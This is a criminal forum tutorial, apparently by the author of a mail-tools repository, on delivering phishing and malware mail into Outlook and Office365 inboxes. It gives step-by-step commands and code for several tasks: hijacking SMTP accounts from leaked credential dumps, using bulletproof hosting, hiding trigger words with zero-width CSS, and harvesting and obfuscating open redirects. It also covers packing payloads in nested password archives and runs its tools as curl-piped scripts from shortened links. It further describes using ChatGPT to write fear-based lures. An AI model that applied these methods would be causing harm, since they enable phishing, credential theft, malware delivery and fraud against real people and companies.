Spam: Inboxing corp-mails / Outlook

[Man]

Hello.

Probably you also know me as an owner of the github.com/aels/mailtools repository.
After a hundred questions like "how to inbox" I've finally decided to write the full tutorial, covering all the small details of how to f*ck into outlook boxes.

With reservations, this method also works for Office365. Used techniques are the same because outlook and office365 share the same anti-spam engine, but office365 boxes usually have additional signature-based spam filters, configured by the admin. They are not that bad but sometimes make the inboxing process harder. You can read more about these filters here:

• Blocking-email-spam-with-the-office-365-spam-filter-for-administrators
• Office-365-security-anti-spam-policies-configure

Initially, this tutorial was fully private and I sold it hand-to-hand for 2k$. But... since it's not that comfortable to buy info with blindfolded eyes, I've decided to make a significant part of it public and free, only to let you make your own decision, whether you need this info and it is worth it money.

{!} Honestly, if you want to send less than 10,000 emails per day, you can use services like falconsender.ru, postmarkapp.com or mailersend.com, and you will be just okay. But... if you are planning to send hundreds of thousands of emails per day, prepare a liter (or two liters) of coffee, and let's do it.

What are we going to find out? Table of Contents​

• Preparing a lead base
• Collection and filtering of smtp servers
• Composing the text of the letter
• Letter obfuscation
• Images in the letter
• Creating trust redirects
• Redirect Obfuscation
• Landing Page Protection from Google SafeBrowsing Red Screen
• Selecting and preparing an attachment
• Tracking email views by recipients
• Ban on letter forwarding
• Protecting a link in an email from automatic analysis
• Checking for inbox
• The difference between mailers at the network level and which one to choose
• Launching the campaign (wow, it was a long road)
• Bonus: Where to get relatively fresh lead databases for mailings

Let's begin.

Corps. They are Outlook. Letters burn quickly? Let's prepare the lead bases correctly​

Statistically, more than 60% of corporations are hosted on Outlook. The rest are with AV companies, and on their own servers like Zimbra, etc. Therefore, before sending, we need to filter our database specifically for Outlook. To check who manages the mail of a particular domain, just look at the mx records of its DNS server. To check domains individually, you can use, for example, the Chrome extension https://chrome.google.com/webstore/detail/ip-address-and-domain-inf/ (Domain tab)

In the case of feedly.com we see that their mail is managed by google.com

To quickly check and filter out dangerous mails, I wrote a sanitizer that filters out dangerous mails managed by AV companies (for example, perimeterwatch, proofpoint, fireeye, etc.), or, in our case, leaves only mails hosted by specific companies.

Validol: https://github.com/aels/mailtools/tree/main/remove-dangerous-emails

This validator is designed to run on MacOS or Linux, so for windows users I recommend taking a linux-vps (buy a cracked one to avoid complaints, for example, on xleet.pw ), or using disposable servers from THC, or using WSL (windows subsystem for linux - this is ubuntu, built into windows). Here is an instruction on how to enable WSL on your machine: https://devblogs.microsoft.com/commandline/install-wsl-with-a-single-command-now-available-in-windows-10-version-2004 -and-higher/

For the sanitizer to work we will need python3(and it will install everything else itself during the first launch). Python can be installed with this command:

# this command for MacOS
brew install python3

# this command for Ubuntu users
apt install python3

There is no need to download the validator separately, as it is downloaded from GitHub every time it is launched. Let's launch it with the following parameters:

python3 <(curl -fskSL bit.ly/getsafemails) /path/to/mail_list.txt outlook

(*) The mail sheet can be in any format, and in addition to the mail, contain any data (they will remain intact).

At the output we will get a base containing only outlook mails. We will work with it further.
If you are not sure about the quality of your base, then in order not to kill smtp servers with bounce emails, you also need to filter the base for non-existent emails. You can do this for a fee (after filtering through Validol, it is already much cheaper) on the service https://debounce.io/.

Now we need clean smtp servers. It is impossible to put letters sent from domains that do not have records configured dmarkand into Outlook spf. Therefore, sending from shells or with substitution of the sender's domain does not suit us.

By using hacked smtp servers we save ourselves from the need to warm up domains and IP addresses, which we would have to do if we used our own servers (smtp server domains are already warm). Webmailing loses to smtp servers in terms of speed (ten times faster), cost (since the limits for bigs are from 50 to 500 letters per account), and convenience (making your own webmail farm is bad fun).

Where to send from? SMTP servers​

After tens of millions of letters sent, I was unable to deduce patterns or find specific smtp servers that would be guaranteed to deliver at least simple text to the inbox (this applies to the domains of outlook itself, and ionos, and amazon-ses, and all the others). Therefore, we will take smtp servers from wherever we have to, and simply send a test letter from them to the outlook box. Then we will collect those letters that got to the inbox, and we will use the lines of these smtp servers for further mailings.

Where to get SMTP servers? Let's get them ourselves​

We can do it for free. For this we need any smtp-checker (of which there are enough on the Internet). I did not trust other coders, and wrote my own smtp-checker:
https://github.com/aels/mailtools/tree/main/smtp-checker
(*) It is also designed to run on MacOS or Linux.

Before launching it, make sure that the IP address of the machine you will use it from is not on the SpamHaus blacklist, otherwise many smtp servers will refuse to authorize us. You can do this, for example, on the site https://check.spamhaus.org/. In my case, for example, my home address is on the blacklist:

what a f*ck...

As a rule, all addresses belonging to ISPs (home Internet providers) are blacklisted by SpamHaus, as they are not intended for sending mail directly from them. Therefore, in this case, we will still have to use a VPS server.

Where can I get an abuse-resistant server for a reasonable price?​

If you really need a bullet-proof server, keep in mind that, as a rule, the IP ranges of such servers are very dirty, and when sending from them, the inbox will drop at least by half.

The most resistant to any dirt servers are the exit nodes of the tor network.

Let's go to their list: https://metrics.torproject.org/rs.html#toprelays,
And we choose a suitable country (I recommend Romania, because this country does not cooperate with the FBI, and yet it is located in Europe). For example, we take a node with the IP address 185.165.171.84. Then we go to abuseipdb.com to find out which hoster this IP address belongs to.

Familiar flokinet, who accept payments in btc. Excellent. We will buy a VPS from them. After the purchase, we will definitely check its IP address for cleanliness in SpamHaus (since someone before us could have already dirty this IP address). A clean IP is also important for us because almost all smtp servers transmit it in the letter along with the headers, and outlook pays attention to its cleanliness. Floki's subnet is dirty as can be, and this will certainly add penalty points to the letter, but we can tolerate this if we do all the other steps correctly. This is the price of no complaints about the server.

In addition to the smtp checker, we will also need absolutely any (of any freshness) sheets containing emails and passwords. You can take them from public distributions, for example, on these forums:
https://nohide.space/forums/razdacha-baz-dlja-bruta.3/
https://forum.exploit.in/forum/96/
https://xss.is/forums/140/
https://breached.vc/Forum-Databases

I do not recommend buying mailass databases (at least to start with), because they have usually been through a dozen hands, and their inbox will not be better than databases from public distributions. However, if you need a database with 70%+ validity, I have uploaded 125,000 private mailass for you: https://satoshidisk.com/pay/CHatId.
(*) I apologize for the symbolic price of $100 - this is necessary so that the base is not killed by lovers of freebies with crooked hands. The entire amount from its sale will go to charitable funds.

My checker will automatically detect fields containing emails and passwords, so absolutely any sheet format is suitable for us, whether csvwith any fields (including mail and password) or sqldatabase dumps.

We also need a test box in Outlook itself. In the case of Outlook, the inbox is different for mails created in different regions. If we want to send mailings to America, we will register a box from an American IP address (if you don't have US-SOCK at hand, you can use any VPN extension for Chrome, such as ZenMate). For example, let our box be die-hard-us@outlook.com.

Not all smtp servers are the same. In addition to the purity of their IP address and subnet as a whole, they differ in the way they interact with the recipients' mail servers (in our case, Microsoft).

Their main differences are:

• MTUpackets, which differ depending on the operating system on which the smtp server is running
• support keep-aliveconnections
• support for data transfer types chunkingand chunk names
• support pipelining-transmission
• support for data transfer in binary form
• and probably some other parameters that I don't know about

Therefore, not all test letters sent from various smtp servers will reach our test mailbox inbox.

Let's launch our checker with the following parameters (you don't need to download it first):

python3 <(curl -slkSL bit.ly/madcatsmtp) /path/to/mail_pass_list.txt die-hard-us@outlook.com

The check process is in progress

Valid smtp accesses will be placed in the same folder where the original file is located, with the name mail_pass_list_smtp.txt.

But not all of the accesses we received will be able to send a letter or deliver it to the inbox. Therefore, after the checker finishes working, we will go to our test box and take from there all the smtp-accesses that got into the inbox folder. Depending on the age and the rigor of the base, there can be 0.1%, and 90% (in the case of purchasing a completely valid mailass base) of the total number. The limits for sending letters for user smtp are usually small (from 50 letters in the case of gmail, to tens of thousands in the case of corporate outlook or ionos accounts), so the more smtp-accesses we have, the better. On average, 100 accesses are enough to send 30-50 thousand letters.

Let's collect them in a separate file (for example, let it be the smtp_list.txt file).

When we send mailings, the letters will be marked as spam after some time, and in this case the smtp from which we sent the letters will be marked as dirty. Then if we send "clean" letters from it, they will be marked as spam literally within an hour. Then all clean smtp servers from which the dirty letter was sent will also be marked as dirty. In Outlook, this is not a death sentence, such mailings only raise the "mistrust score" of smtp servers, and this score is zeroed out over time (from a day to a week). Therefore, it is important to recheck smtp servers on inbox before each mailing.

Just like mail.ru, in Outlook, letters from the inbox folder are rechecked for spam once every 30 minutes and flow into the "spam" folder after a few hours, when enough users click on our letter "this is spam". The maximum number of letters will flow into the spam folder after 5-6 hours. To avoid this, you need to put the maximum percentage of letters in the inbox initially and randomize the text of the letter as much as possible.

Despite the fact that almost all antispam systems in the old days began their development with SpamAssasin, now they are complex monsters. There is almost no public information on the work of antispam in Outlook, but there are several articles on the topic of antispam in Google. I recommend this story of the fight against spam from a Google engineer for general development: https://moderncrypto.org/mail-archive/messaging/2014/000780.html?hn
We got distracted... Well... Now we need a letter.

The scam doesn't convert? Let's write a great letter.​

When working with corporate users, our goal is not to sell something, but to make the user perform an action, so the classic "find the pain and offer relief" technique does not work. But fear works great. A frightened user switches off critical thinking and will fall for our bait much more easily.

Most of all, a person is afraid of losing something important: an account, a job, a chance.

We cannot obfuscate the letter header and it will have to be written as neutral as possible to avoid getting caught by the spam filter. For example, "System notification" or "Invoice status #347334". And in the body of the letter, in general, we can write anything, because then we will hide all the "alarming" words from the Outlook antispam filter.

For a general understanding of what emails give a good CTR, here is an example of an email that I used in my work for a week:

This letter addresses the recipient politely, reasonably, and persistently - from the boss's position. And it works.
I do not recommend using phishing email templates found on the Internet (unless you know exactly what you are doing), because in addition to the need to know html and css, they have all been detected by spam filters for a long time, and rewriting and obfuscating them will take you a lot of time and effort.

To write good fake letters we need to know behavioral psychology. For general development I highly recommend the following books:

• Eric Berne "Games People Play"
• Robert Cialdini "Psychology of Influence"

But... we don't really need all that anymore. AI comes into the picture. After dozens of letters ordered from different copywriters, ChatGPT has become a real gem, because surprisingly, the letters written by it tear apart any copywriter in terms of efficiency. That's why we'll turn to it, and not to a living person:
https://chat.openai.com/chat

ChatGPT is not available for all regions, and if you can't register, then use a European or American IP address, and receive SMS on a physical number of the corresponding country. E-sim of the desired country can be purchased for ~$20 on the site prepaid-global.com.

The distinctive feature of this AI is its kindness, politeness and understanding of the essence of the problem. Therefore, in the hands of a scammer, chatGPT turns into complete evil. Just look at how easily it tricks the user into verification:

It's amazingly beautiful and terrible.

Now let's write a letter for ourselves:

Now let's ask ChatGPT to randomize the text of the letter for us:

Yes - that's how easy and simple it is to get an effective letter. Let's save the received text in the file lure.html

A respite​

Well done if you've made it this far. Here's some music to keep you going on the go:

Let's go have some coffee so that everything you've read can settle in your head.

Moving on​

Spintax randomization is still not enough to prevent our email from being detected by spam filters. It still contains alarming words aimed at attracting the user's attention. These words include: invoice, important, urgent, buy and many others. We will take an incomplete list of such words from the article https://blog.hubspot.com/blog/tabid...ltimate-list-of-email-spam-trigger-words.aspx. This list also includes brand names, such as "Paypal", "USPS", "Amazon" and others. They have no place in emails sent from domains other than their own. Let's reread our email again and find words that catch our attention and raise alarm.

Don't try to hide them by replacing letters with visually similar ones (for example, Latin "a" with Cyrillic). All spam filters I know automatically determine the language in which the letter is written, and if it contains symbols of different locales in one word, then the mistrust score for it increases sharply. In the case of, for example, SpamAssasin, you can read about it at the link:
https://spamassassin.apache.org/full/3.1.x/doc/Mail_SpamAssassin_Conf.html

In the "Language Options" section. And pushing such a letter into the inbox will be much more difficult (but not impossible). We will deal with "alarming" words through "zero-font".

Is the letter still going to spam? Let's obfuscate it with Zero-Font​

The word "zero-font" means a zero-size font. In fact, this is not entirely true. There are several ways to hide words on a page from the user's eye using CSS, for example:

• use zero font size
• use the same text color as the background
• use zero block length with text
• use the opacity property
• use the display:none property;

And several other properties that will allow you to hide unnecessary parts of the letter from sight. The problem with such methods is that almost all of them are detected by antispam filters and only cause harm. A property that is currently not detected and does not cause problems for Outlook is width.

To get rid of "alarming" words in a letter, it is pointless to hide them, but to split them into several parts with invisible blocks with other text is no problem. In SpamAssasin (and probably in many other antispam filters) "trigrams" are used to create detections - these are three letters following each other. That is, in the word Viagra there are four trigrams: via,iag,agr,gra. And based on the presence of these four trigrams in the body of the letter, it will be given the verdict "spam". In Outlook they went a little further, and the purity of the letter is considered not only by the presence of certain trigrams, but also by the distance between them (the concentration of bullshit). Therefore, we will split alarming words with other phrases of 3 or more words.

First, let's add a block of css properties to the letter to ensure that our magic block has a zero length. Initially, text strings have the type inline and their own length is ignored by the browser. However, if you change their type to inline-block, the browser begins to respect their attribute width.

Let's add the following html code to the letter:

<style type="text/css">u { display: inline-block; width: 0; overflow: hidden; white-space: nowrap; }</style>

In it, u we set the tag to a line-block type, zero length, a command to hide its overflow with text, and prohibitive line breaks so that it does not grow in height. Then we proofread our letter, and each word that we do not like we break up with a tag ucontaining some phrase. For example:

But it's not about being another "ho<u>seems not yet </u>rny bb slut",

B vio-la, we've gotten rid of the word horny. And our letter starts to look something like this:

Now we are faced with the question of how to get what we want from the recipient: either a click on the link or launching the attachment.

Is Your Email Boring? How to Add Images Correctly​

First of all, I want to say that bare text in an email inspires more trust and often produces more conversions than a colorful email stuffed with images, because users are tired of bright marketing emails.
Outlook can only analyze images that are included in the email via imgthe -tag and encoded inside srcthe -attribute using data-url. Also, this method of including images in the email increases its weight. This is of no use, since images encoded via data-urlare not displayed anyway if the email ends up in the spam folder. Therefore, we will include in the email code only images hosted on our servers. The domain from which the image is included should also have a good traffic rank (we will talk about this in the next chapter).

It is convenient to place pictures on content servers github or even telegraph. But please do not place them in discord, because its domains are heavily polluted by novice virus distributors.

Ten years ago, spam with one large image containing all the text was popular. Since Outlook cannot analyze images loaded from outside, its anti-spam system has developed a distrust of such letters. On the other hand, images are used everywhere in marketing letters.

Safe concentration of images for Outlook, measured experimentally - one image per 30 lines of code and text.
SpamAssasin uses different proportions. You can read about it for general education at these links:
https://svn.apache.org/repos/asf/spamassassin/trunk/rules/20_html_tests.cf
https://www.quora.com/How-does-Spam-Assassin-calculate-image-to-text-ratios

Images are often included with their dimensions specified in the body imgof the -tag:

<img src="https://path-to-img" width="100" height="50"/>

Outlook can use these parameters to calculate the image size. However, if you do not specify them, the browser will display the image in its natural size.

<img src="https://path-to-img"/>

This approach is also not suitable for us, because Outlook antispam does not trust such images. However, we can specify the width as a percentage of the parent block width:

<img src="https://path-to-img" width="100%"/>

In this case, the image will take up the entire width of the parent block, and the height will be automatically calculated by the browser so that the image maintains its proportions.

And this approach does not suit us in its pure form. Because if the image is included in this way directly in the body of the letter, then Outlook understands that it will take up the entire width of the screen. However, if we place the image, for example, in a table cell, or inside several div elements, then such an image will be accepted and passed by the anti-spam filter without any problems:

<table>
  <tbody>
   <tr>
    <td><b>text with zero-font</b></td>
    <td width="100%"><img src="https://path/to/image" width="100%"/></td>
    <td><b>text with zero-font</b></td>
   </tr>
 </tbody>
</table>

In this case, the antispam will not be able to calculate the size of the image and will skip it.

If we want to add animation to a letter, we will not use gif-images, because they have a very limited color palette and are large in size. For several years now, all browsers have supported a more suitable format for us - "animated png files" with the extension .apng. They have an excellent compression ratio and an almost unlimited color palette. Browsers also support streaming of such images and will start displaying them in the browser without waiting for them to be fully loaded. In this way, we can even simulate video without sound. You can provide video with subtitles on numerous services, for example here: clideo.com/add-subtitles-to-video, and you can convert video to the format .apng here: ezgif.com/video-to-apng.

Great. We've sorted out the images, let's move on to the links.

Link not getting into inbox? Let's create clean and trustworthy redirects​

Antispam filters do not have the right to check the content of links, because otherwise they would regularly step on important links for confirmation of activation, verification, account deletion, etc. However, Outlook at least checks the following parameters for each link:

• signature detection of known bad strings
• domain traffic rank
• domain age
• domain popularity within outlook itself
• the IP address that the domain refers to and the reputation of that IP address (including how many other domains are located on that IP address)
• rating of the subnet of the IP address, depending on its popularity and the number of dirty IP addresses and domains in it.

For this reason, we cannot use redirects hosted on shells or any other hacked sites, cPanels, etc. Because shells are usually obtained through public vulnerabilities and have been tainted by many spammers long before us. Also, shell domains usually have a near-zero traffic rank, and are located on shared hostings along with hundreds of others. Using CloudFlare partially solves this problem, but we will choose another path.

For a great inbox, we need links on domains that collect a lot of traffic, have been registered for a long time, are frequently used, and link to IP addresses that have not been found to have malicious activity.

Click-trackers of popular banner servers are ideal for this, since each of them is an open redirector. You can find them through the Chrome extension Redirect-path by clicking on banners on different sites (don't forget to turn off your ad-blocker before doing this).

Here are some examples of redirects I found in 15 minutes:

https://track.adform.net/adfserve/?bn=12345;redirurl={{url}}
https://secure.adnxs.com/seg?redir={{url}}
https://p.rfihub.com/cm?forward={{url}}
https://tags.bluekai.com/site/35702?redir={{url}}
https://ssum.casalemedia.com/usermatchredir?s=183875&cb={{url}}
https://sync.mathtag.com/sync/img?cs_wd_sy=1&dp=43&redir={{url}}

Each such redirect is enough for us to send out ~50 thousand letters without randomizing the rest of the link and without adding junk parameters. Then we give them a week of rest, and they will start going to the inbox again. The result is super.
But what if we need a lot of trust redirects? To do that, we need to visit a lot of sites via banners. Fuck it. Millions of links have already been collected for us (and we don't have to pay for it).

The guys from UrlTeam have collected all the addresses where popular link shorteners lead. And among them there are many, many open redirects. Here is a complete archive of their work by date:
https://archive.org/details/UrlteamWebCrawls

From here we will take as an example the archive of links where the long-closed goo.gl shortener (or any other) leads:
https://archive.org/details/urlteam_2023-01-14-00-17-02

And we will collect hundreds of trust redirects exclusively for ourselves. For this...

WOW. We're a third of the way there. Great! More to come.​

Here's what we still have to find out:

• Creating Hundreds of Trust Redirects (continued)
• Redirect Obfuscation
• Landing Page Protection from Google SafeBrowsing Red Screen
• Selecting and preparing an attachment
• Tracking email views by recipients
• Ban on letter forwarding
• Protecting a link in an email from automatic analysis
• Checking for inbox
• Why does one mailer send to inbox, and another to spam? Choosing a mailer
• Launching the campaign (wow, it was a long road)
• Bonus: Where to get relatively fresh lead databases for mailings

If you are disappointed with the course, write to me within a week and I will refund your money.

Profit to you. I'm waiting for you in the second part of our story.

(c) Aels

 

[Man]

Let's go.

Link not getting into inbox? Let's create clean and trustworthy redirects​

Antispam filters do not have the right to check the content of links, because otherwise they would regularly step on important links for confirmation of activation, verification, account deletion, etc. However, Outlook at least checks the following parameters for each link:

• signature detection of known bad strings
• domain traffic rank
• domain age
• domain popularity within outlook itself
• the IP address that the domain refers to and the reputation of that IP address (including how many other domains are located on that IP address)
• rating of the subnet of the IP address, depending on its popularity and the number of dirty IP addresses and domains in it.

For this reason, we cannot use redirects hosted on shells or any other hacked sites, cPanels, etc. Because shells are usually obtained through public vulnerabilities and have been tainted by many spammers long before us. Also, shell domains usually have a near-zero traffic rank, and are located on shared hostings along with hundreds of others. Using CloudFlare partially solves this problem, but we will choose another path.

For a great inbox, we need links on domains that collect a lot of traffic, have been registered for a long time, are frequently used, and link to IP addresses that have not been found to have malicious activity.

Click-trackers of popular banner servers are ideal for this, since each of them is an open redirector. You can find them through the Chrome extension Redirect-path by clicking on banners on different sites (don't forget to turn off your ad-blocker before doing this).

Here are some examples of redirects I found in 15 minutes:

https://track.adform.net/adfserve/?bn=12345;redirurl={{url}}
https://secure.adnxs.com/seg?redir={{url}}
https://p.rfihub.com/cm?forward={{url}}
https://tags.bluekai.com/site/35702?redir={{url}}
https://ssum.casalemedia.com/usermatchredir?s=183875&cb={{url}}
https://sync.mathtag.com/sync/img?cs_wd_sy=1&dp=43&redir={{url}}

Each such redirect is enough for us to send out ~50 thousand letters without randomizing the rest of the link and without adding junk parameters. Then we give them a week off, and they will start getting into the inbox again. The result is super.

But what if we need a lot of trust redirects? To do this, we need to visit a lot of sites via banners. Fuck it. Millions of links have already been collected for us.

The guys from UrlTeam have collected all the addresses where popular link shorteners lead. And among them there are many, many open redirects. Here is a complete archive of their work by date:
https://archive.org/details/UrlteamWebCrawls

From here we will take as an example the archive of links where the long-closed goo.gl shortener (or any other) leads:
https://archive.org/details/urlteam_2023-01-14-00-17-02

First, we will select from this file all links that have another url in their address. On Linux, this is conveniently done with the grep command. Also, before each link there will be an id, which we do not need. Let's remove it with the cut command:

cut -d '|' -f 2 /path/to/goo-gl-urlteam-urls.txt | grep "=http" > click-trackers-to-check.txt

Then we need to check which redirectors are still alive and will remain operational if we change the site address in their parameters to another one. First, we will replace all the addresses in their parameters with the site example.com using the sed utility:

sed 's/=http/=https\:\/\/example.com%23/g' click-trackers-to-check.txt > click-trackers-prepared.txt

With the code above, we replaced all the links in our potential open redirects file in their parameters to the example.com domain with a %23- this is an encoded character #that will instruct the browser to ignore the rest of the url that comes after it when redirected.

Then, to check which links are still working, we need to check which of them actually lead to example.com after the redirect. For this, we use the web-fuzzer ffuf (github.com/ffuf/ffuf). Let's install it:

# this command is for Linux:
apt install golang-go
go install github.com/ffuf/ffuf/v2@latest

# this command is for MacOS:
brew install ffuf

And let's run it with the following parameters:

ffuf -w click-trackers-prepared.txt -u FUZZ -r -mr "-apple-system, system-ui, BlinkMacSystemFont" -o click-trackers-tested.txt -of csv -timeout 2 -t 20

• -w- this is our file with links that need to be visited and checked.
• -u- what symbols these links need to be wrapped with, and the keyword FUZZ, in place of which our link will be inserted (since we only use the word FUZZ, the links will be requested "as is")
• -r- "follow redirects" instructions
• -mr- an instruction to search for a text string on the visited page. In our case, this is a string from the code of the site example.com
• -o- file where to save the results
• -of- format of the file with results. In our case - csv.
• -t- the number of fuzzer threads. ffuf is a very powerful thing and can hold up to a thousand threads, but in any case we will either run into the VPS server's channel capacity or blow it up. So let it be 20 threads (let's not be greedy).

Let's wait until the check is finished and get the results. In addition to the necessary addresses, they will also contain extra fields:

Let's remove them using cut, sort them:

cut -d ',' -f 2 click-trackers-tested.txt | sort -u > click-trackers-sorted.txt

*if you are using MacOS, enter the command first LC_CTYPE=C && LANG=C;, otherwise cut will throw an "Illegal byte sequence" error.

Now we need to remove duplicate domains, of which there will be a lot. To do this, we will write a python script:

#!/usr/local/bin/python3

import sys, re
with open(sys.argv[1], 'r', encoding='utf-8', errors='ignore') as fp:
 prev = fp.readline()
 while True:
  next = fp.readline()
  if not next:
   exit(1)
  if not next[0:20] in prev:
   print(re.sub(r'https://example.com[^&]+', r'{{url}}', next), end='')
   prev = next

https://gist.github.com/aels/7150b6d3615f4ff9f3acd80d8f64ff9f

Let's save it as remove_dupes.py and call it, passing our file as a parameter:

python3 remove_dupes.py click-trackers-sorted.txt
 > click-trackers-uniq.txt

We now have our own, private and trust redirectors.

I got 60+ redirects from the goo.gl archive for 2017

If you found it difficult to go through the steps to get them, here are my redirectors (they will last for a while until they get dirty):

https://gist.github.com/aels/4692b4e8016e93a8de31cb0085aa0c97

Take any random redirector from this list

To track clicks, we just need to use any URL shortener, such as gg.gg, bit.ly, is.gd or any other. If we need to transfer parameters to our target link (for example, the recipient's email), then we need to use shorteners that can do this, such as tinyurl.com.

If we want to pass parameters usermail={{email}}to id=273427the site example.com, then our desired link will look like this:
https://example.com/?usermail=john@outlook.com&id=273427

Then the shortened link will be:
https://tinyurl.com/kjcr75us?usermail=john@outlook.com&id=273427

Now let's add it to our redirector:
https://tags.bluekai.com/site/35702? redir=//tinyurl.com/kjcr75us?usermail=john@outlook.com &id=273427 - not correct.

In the example above, all parameters after the first character &will be passed by the browser to the redirector domain (in our case, tags.bluekai.com). In order for the browser to understand that these parameters belong to the shortener link passed in the parameter redir, it is necessary to URL-encode either the entire redirlink passed in the parameter (for example, on the urlencoder.org website ), or at least all the characters &in it. Then our correct link with the redirector will look like this:
https://tags.bluekai.com/site/35702?redir=//tinyurl.com/kjcr75us?usermail=john@outlook.com&id=273427.

Now the browser will understand that all the parameters of our shortened link via shortner need to be passed to the redirredirector parameter.

Link obfuscation and nice little things​

When a browser requests a link

Example Domain

, it first performs a number of normalizations on it, such as:

• decoding utf8-homonyms: http://exa⁤Ⓜple.com/ - symbols of other locales are converted to their ascii-equivalents.
• url-decoding: http://exa⁤mple%2ecom/ - the domain name undergoes url-decoding before sending the user to it. Unfortunately, this method cannot be used with symbols of other locales.
• Port formatting (if specified): https://example.com:000443/ - in Chrome and Safari (95% of the browser market in total) you can specify any number of zeros before the port. Default ports: 443for the https protocol and 80for the http protocol.
• protocol normalization: ///example.com/ - you can remove the line https:and the link will continue to work, and the protocol will be taken as the protocol of the parent page. Instead, //you can use ///, and such a combination will also be correctly perceived by the browser.

Let's see what we can do with the link to make it continue to work:
///ⅇ⁤Ⓧ⁤ᵃ⁤ℳ⁤ｐ⁤ᴸ⁤ₑ⁤．⁤ⓒ⁤ｏ⁤Ⓜ:0443/

For fun, you can play around with a generator of such domains: https://splitline.github.io/domain-obfuscator/. We will not use it in battle, because links with domains that contain utf8 homonyms or links that do not start with httpare blocked in Outlook for security purposes. Nevertheless, some manipulations are still available to us, because we will perform them not on the main domain, but on the shortener domain, which is in one of the parameters.

Now let's prepare the final link:

https://traffic.shareaholic.com/e/?u={{url}}&r=1&a=1&s=313&f=2309672

Let's replace our macro and remove https ( ///not all redirectors understand it, and the one we chose doesn't understand it):

https://traffic.shareaholic.com/e/?u=//tinyurl.com/kjcr75us?usermail=john@outlook.com&r=1&a=1&s=313&f=2309672

Url-encode the point:

https://traffic.shareaholic.com/e/?u=//tinyurl%2ecom/kjcr75us?usermail=john@outlook.com&r=1&a=1&s=313&f=2309672

Let's add the port and url-encode the dot again (since the first time it is decoded as part of the url, and the second time - as part of the domain):

https://traffic.shareaholic.com/e/?u=//tinyurl%252ecom:00443/kjcr75us?usermail=john@outlook.com&r=1&a=1&s=313&f=2309672

Vio-la, the final link for the letter is ready. Now Outlook does not detect the shortener domain in it by signature. Now, even without additional littering of the link with fake parameters, we can safely send out ~50,000 letters with it inside.

Now that we have a trusted link, let's go back to the body of our email for a second. Outlook doesn't like it when the text inside a link and the address it leads to are different, so we'll change our link in the email's HTML code so that the text inside it appears to match its address. In my case, the code now looks like this:

<a href="https://tags.bluekai.com/site/35702?redir=///is.gd:0443/6qhDFV"><u>https://tags.bluekai.com/site/35702?redir=///is.gd:0443/6qhDFV#</u>https://only<u> ah, no more fans for me =( </u>fans.com/mashaspeechka</a>

Amazing.

How to protect your landing page from Google Safe Browsing red screen?​

This is quite a broad topic. In order to do everything correctly, and our page does not light up with a red GoogleSafeBrowsing screen, I wrote a separate step-by-step instruction:

Getting rid of Google Safebrowsing red screen once and forever. Step by step.

Now I've written a step-by-step guide with code examples on how to save your landing page from the red screen of happiness. 0. What do we learn? Contents What Google Safe Browsing consists of How to choose the right domain How to create a correct ssl certificate How to hide landing page...

carder.market

Let's talk about attachments​

Almost all executable files are prohibited from being sent to Outlook (as well as to Google, by the way). Here is a complete list of prohibited file extensions:
https://support.microsoft.com/en-us...-outlook-434752e1-02d3-4e90-9124-8b81e49a8519

If we want to put one of these file types into the inbox, we need to put it into an archive first. However, this will not save us from detection by the antivirus (Outlook uses the engine from Windows Defender). All archives are unpacked without problems at least to a depth of 5 attachments (I did not check further due to the pointlessness of the process). Therefore, the file must be sent clean, or, at least, not detected by Defender during static analysis as malicious.

I recommend checking files for cleanliness using the service www.checkzilla.io

A password-protected archive is not a bad solution, and although it adds suspicion points to a letter, it is quite possible to put it in the inbox if we are not exposed by other parameters. In the case of both SpamAssasin and Outlook antispam, their antispam filters do not analyze binary files. These files are passed to the antivirus engine. And despite the presence of a password, the antivirus can still see the names of the files in the archive. Therefore, the checks are much better for nesting dolls of the form password-protected-zip->iso->lnk (the lnk file is taken in this case as an example. It can be doc, xll, or any other to your taste ).

In the case of SpamAssasin, by default the maximum file size that is transferred to the antivirus engine (most often Amavis) for analysis is 25Mb. Unfortunately, there is no such limit in Outlook, and the maximum size of the transferred file is only 20Mb. All other files are suggested to be uploaded to cloud storage.

And that's a great idea. We have two options here:

• We can make a page that imitates, for example, the OneDrive service.
• We can place our file on the real OneDrive, share it "for everyone", and using the instructions https://metadataconsulting.blogspot.com/2019/03/OneDrive-2019-Direct-File-Download-URL-Maker.html get a direct download link, which we hide in a trust redirect, following the instructions described above. If this is not a password-protected archive, the file will light up with the first visit of the GoogleSafeBrowsing crawler. But this will happen in 2-3 hours. During this time, you need to do everything.

In the case of Outlook, you should not use brand words in attachment names (for example, FirefoxInstaller.msi), because this dramatically reduces the inbox. We also cannot use emoji in attachment names, or special characters such as hanging tabs, line breaks, carriage returns, and the like - such letters will not even end up in spam.

The most popular attachment formats at the moment are html, htm, rar, pdf, svg (vector graphics format that can contain javascript code, which is enough to redirect the user or upload your phishing instead of an image). And they all fit perfectly in the inbox. There is no point in using pdf to hide links leading to your phishing (it will not extend the life of the link), since WindowsDefender has a built-in decoder and parser for pdf files. Also, do not send a .doc document with macros without first removing it to an archive with a password, since WindowsDefender also extracts macros from the .doc document and analyzes them.

A password-protected archive, although it reduces corruption several times, is currently the best way to deliver executable files for Outlook (the main thing is to explain to the recipient of the letter in plain language the need for a password, for example, " We value your privacy, so..." etc.).

Attaching a file with your payload to the body of the letter guarantees that your payload will fall into the hands of antivirus company employees. If you still consider this method of sending necessary, we can hide the executable file in the body of the attached .html or .svg page. Here is a detailed article with code examples describing how to do this:
https://blog.delivr.to/html-smuggling-recent-observations-of-threat-actor-techniques-74501d5c8a06

One of the less commonly used file formats I recommend trying is .vhd(windows virtual disk). Let's cross our fingers and wish us many downloads and launches.

Email View Tracking​

The good old pixel added to the end of the email works great, but it is blocked from loading if the email ends up in spam. So we can only track the number of views of emails that end up in the inbox.

<img src="https://trusted_domain/image_tracker.png" width=1 height=1>

Also, all HTML tags that can be used to send a request to another domain are blocked or removed from the body of the letter: img, picture, object, figure, link, set via the CSS property ::before and content for elements, etc., if they contain a request to an external domain via http/https. This is a difficult or expensive problem to solve. The ability to send a request "outside" from a spam letter is a vulnerability that falls under the Microsoft bug bounty program. Therefore, finding a way to track letters from the spam folder is a task for cool specialists who deeply understand the work of HTML and CSS parsers, and at the same time for some reason will not hand over the found method to Microsoft. As for us, mere mortals, you can forget about it. However, such vulnerabilities are regularly found in corporate mail servers of less popularity. For example, the ability to request an arbitrary URL in letters, found in Horde WebMail: https://www.sonarsource.com/blog/horde-webmail-rce-via-email/

Yes, it's that simple.

